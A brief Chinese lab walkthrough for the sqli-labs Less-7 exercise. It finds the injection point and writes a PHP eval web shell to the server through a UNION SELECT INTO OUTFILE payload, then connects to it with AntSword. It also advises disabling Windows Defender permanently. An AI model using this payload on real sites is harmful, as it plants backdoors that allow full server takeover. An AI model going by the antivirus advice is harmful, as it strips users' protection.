(纯小白,有建议欢迎提出)
一.判断注入点
很容易得出 ?id=1'))--+
二.写马
用到文件写入操作,需要开启mysql中的文件写入:
打开这个文件
\phpstudy_pro\Extensions\MySQL5.7.26\my.ini
加上这句代码(修改完成后记得重启mysql才能生效 )
secure_file_priv 用来限制导出效果,有三个属性:
null限制不能导出
为空可以自定义
为一个路径则只能导出到指定路径
先使用order by 判断出字段数为3
然后构造payload:
?id=1')) UNION SELECT 1,2,'<?php @eval($_REQUEST["password"])?>' into outfile'Z:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--+
?id=1')) UNION SELECT 1,2,'<?php @eval($_REQUEST["password"])?>' into outfile'Z:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--+
注意:要先在Windows 安全中心把实时保护给关了,要不然你传一个他给你删一个........
(手动关的话下次开机就会给你打开,很恶心,如果想永久关闭,可以试试这个一键关闭微软杀毒软件_Windows_Defender)
中国蚁剑直接连,成功